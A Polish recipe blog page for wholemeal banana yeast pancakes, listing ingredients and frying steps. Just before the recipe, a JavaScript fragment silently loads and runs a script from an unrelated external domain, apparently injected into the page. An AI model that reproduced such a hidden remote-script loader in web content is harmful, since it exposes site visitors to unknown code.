, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

razowe racuchy bananowe

Wydrukuj artykuł Wydrukuj artykuł

bananowe racuchy z mąki razowej

Jestem wielką fanką racuchów i placuchów dlatego próbuję przepisów wszelakich. Dzieciorki zajadały z musem z ubiegłorocznych papierówek. Tato jak zwykle z syropem klonowym.

Składniki:

  • 2,5 szklanki mąki pszennej razowej
  • 1 jajko
  • 2 żółtka
  • 3 łyżki cukru z wanilią
  • 1,5 szklanki mleka
  • 14 g drożdży suchych
  • 2 łyżeczki soku z cytryny
  • 3 duże dojrzałe banany

Banany pokroić w plasterki, wymieszać z sokiem z cytryny.

Pozostałe składniki umieścić w obszernej misce, wymieszać dokładnie widelcem. Dodać drobno pokrojone banany, wymieszać. Ciasto nie powinno być zbyt rzadkie – jeśli tak jest można dodać łyżkę lub dwie mąki. Przykryć kuchennym ręczniczkiem, odstawić do wyrośnięcia na około 1 – 1,5 godziny (ciasto powinno podwoić objętość).

Wyrośnięte ciasto nabierać dużą łyżką i smażyć na rozgrzanym oleju (ja smażyłam na niemal suchej patelni – dlatego moja wersja wygląda zupełnie inaczej niż w przepisie oryginalnym). Odwracać na drugą stronę kiedy powierzchnia racuchów pokryje się pęcherzykami powietrza – tak jak widać na zdjęciu.

Kategoria: Bez kategorii Komentarz »


Skomentuj...



Początek strony